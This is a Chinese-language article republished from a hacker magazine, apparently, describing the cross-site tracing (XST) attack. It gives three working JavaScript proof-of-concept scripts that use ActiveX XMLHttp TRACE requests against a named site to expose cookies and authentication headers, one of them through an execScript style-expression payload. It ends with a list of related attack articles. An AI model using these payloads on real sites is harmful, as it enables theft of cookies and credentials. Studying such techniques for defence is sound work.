cross-site tracing XST攻击_漏洞研究

注意:文章已经发表于8期黑客防线,版权归其所

XST攻击描述:

攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:

1、需要目标web服务器允许Trace参数;

2、需要一个用来插入XST代码的地方; 

3、目标站点存在跨域漏洞。

XST与XSS的比较:

相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。

优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:

<SCRIPT type=text/java script>

<!--

function xssTRACE(){

var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");

xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);

xmlHttp.send();

xmlDoc=xmlHttp.responseText;

alert(xmlDoc);

}

//-->

</SCRIPT>

<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法2: 

<SCRIPT type=text/java script>

<!--

function xssTRACE() {

var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");

var otraceswords=openWin.external;

openWin.location.href=\"http://wmjie.51.net/swords/\";

setTimeout(

function () {

//以下必须写在一行

otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 显示站点wmjie.51.net/swords/ 的头信息。\\n\" + xmlDoc);',\"\",\"\");

},

1024

);

}

//-->

</SCRIPT>

<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法3:

<SCRIPT type=text/java script>

function xssTRACE(){

var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";

var target = \"http://wmjie.51.net/swords/\";

spinach = encodeURIComponent(swords + ';top.close()');

var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';

showModalDialog(target, null, readyCode);

}

</SCRIPT>

<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">

后记:研究阶段,希望能抛砖引玉,期望和您能够交流心得体会。

时间: 2024-08-31 18:24:07

cross-site tracing XST攻击_漏洞研究的相关文章

轻轻绕过你的验证码并进行攻击_漏洞研究

溯雪是早年大名鼎鼎的黑客神器"刀光雪影"之一,其功能就是暴力破解表单,那时很是很流行的.但是后来有了验证码这个东东,几乎把溯雪推向了死路.但是真的完全是死路了吗?本文给你答案. 对于验证码机制,网上的攻击手法都是利用数学方法分析图片,当然我们不能老是跟着别人的思路走噻,那样多没创意哦. 想想验证码的思路,就是每次登陆的地方访问一个脚本文件,该文件生成含验证码的图片并将值写入到session里,提交的时候验证登陆的脚本就会判断提交的验证码是否与session里的一致. 问题出现了,在登陆

如何对PHP程序中的常见漏洞进行攻击_漏洞研究

[库文件] 正如我们前面讨论的那样include()和require()主要是为了支持代码库因为我们一般是把一些经常使用的函数放到一个独立的文件中这个独立的文件就是代码库当需要使用其中的函数时我们只要把这个代码库包含到当前的文件中就可以了. 最初人们开发和发布PHP程序的时候为了区别代码库和主程序代码一般是为代码库文件设置一个".inc"的扩展名但是他们很快发现这是一个错误因为这样的文件无法被PHP解释器正确解析为PHP代码.如果我们直接请求服务器上的这种文件时我们就会得到该文件的源代

技巧和诀窍防范SQL注入攻击_漏洞研究

[原文地址]Tip/Trick: Guard Against SQL Injection Attacks [原文发表日期] Saturday, September 30, 2006 9:11 AM SQL注入攻击是非常令人讨厌的安全漏洞,是所有的web开发人员,不管是什么平台,技术,还是数据层,需要确信他们理解和防止的东西.不幸的是,开发人员往往不集中花点时间在这上面,以至他们的应用,更糟糕的是,他们的客户极其容易受到攻击. Michael Sutton 最近发表了一篇非常发人深省的帖子,讲述在

当备份数据库不能用时.用邮件列表得到WEBSHELL!(图)_漏洞研究

今天上午闲着无聊,刚好一个朋友发过来一个网站的后台管理密码.他要我帮他看看.我说你得到后台了.可以用备份数据库功能得到WEBSHELL啊.你还发过来干嘛.他说后台有数据备份的选项.但是不能用.大家看一下图!  列表得到WEBSHELL!(图)_漏洞研究-数据库备份拿shell">  里面有备份的选项.但是点了之后出现错误!应该是管理员把文件改名了.或者是位置改变了.不能备份数据库,那怎么办,不能白白的浪费这样的一个机会.我就在后台里面到处看了一下.发现可以通过改网站注册用户的邮件地址.我们

最新的黑客技术:XSS跨站脚本攻击详细介绍_漏洞研究

总体上介绍 简单介绍什么是XSS攻击 如何寻找XSS漏洞 对于XSS攻击的总体思路 来自内部的攻击: 如何寻找内部的XSS漏洞 如何构造攻击 如何利用 结何实例攻击,如DVBBS&BBSXP 来自外部的攻击 如何构造XSS攻击 如何欺骗管理员打开 XSS与其它技术的结何 与mssql injection的结合 QQ跨站的结何 国内大型统计网站的跨站漏洞 社会工程学 制作恐怖的flash木马 制作方法由李丰初写 总结  正文: XSS总体介绍 什么是XSS攻击 XSS又叫CSS  (Cross S

UBB的跨站脚本攻击的漏洞_漏洞研究

近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点 什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?  小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点比

研究UBB的跨站脚本攻击之综合篇_漏洞研究

近日,由于发现一些站点仍然存在UBB的跨站脚本攻击的漏洞.跨站脚本攻击虽然很少会对服务器造成一些什么比较大的影响,但对于一个站点来说,存在这种漏洞实在是太不值得!小则,弹点什么东东出来;中则改改主页;重则窃取用户的COOKIES资料,更甚者将会G掉浏览者的硬盘.一个站点被变成一个恶意网站,还有谁敢来?如果再加上该站的站长比较"盲"一些,岂不乱套了?  小小的一段代码就真的能使一个站点成这样?好叫我们来具体的看看所谓的跨站脚本攻击到底会成为什么样的攻击模式.进入一个含UBB功能的站点,比

BBSXP5.15跨站攻击漏洞_漏洞研究

前言:在新云网站管理系统1.02出来的时候,他的留言本就存在跨站漏洞,我测试了黑客动画吧,还好没有开放留言本功能,然后又测试了黑软基地 居然可以成功利用,和新云官方网站都成功拿倒了管理元的cookies.  想不到吧. 看来跨站不得不防范啊!  BBSXP的漏洞近段时间闹得可火.现有的漏洞大家都见过了,就不说了.今晚无聊,看了看BBSXP 5.15最新版的几个文件代码,发现还是存在跨站攻击的漏洞.  Cookies.asp文件,代码如下:   对提交的 "no" 参数没做处理.再看se

跨站脚本说明_漏洞研究

以前看过分析家写过一篇文章,介绍跨站脚本的安全隐患,当时只是知道有这样的   问题,也没有仔细阅读,目前此类问题经常在一些安全站点发布,偶刚好看到这样一篇文章   ,   抱着知道总比不知道好的想法,翻译整理了一下,原文在偶主页的collection目录里,错误   之处请   多多指点.   OK,go............   什么是跨站脚本(CSS/XSS)?   我们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该   页面是可信赖的,但是当浏览器下